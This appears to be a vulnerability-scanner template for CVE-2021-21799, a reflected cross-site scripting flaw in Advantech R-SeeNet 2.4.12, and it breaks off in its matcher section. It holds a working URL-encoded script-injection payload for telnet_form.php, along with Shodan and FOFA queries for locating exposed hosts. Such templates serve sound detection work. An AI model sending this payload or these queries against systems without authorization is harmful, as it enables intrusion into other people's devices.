id: CVE-2021-21799 info: name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting author: arafatansari severity: medium description: | Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Live-Hack-CVE/CVE-2021-21799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-21799 cwe-id: CWE-79 epss-score: 0.80194 epss-percentile: 0.98308 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: advantech product: r-seenet shodan-query: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech http: - method: GET path: - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" matchers-condition: and matchers: - type: word part: body words: - "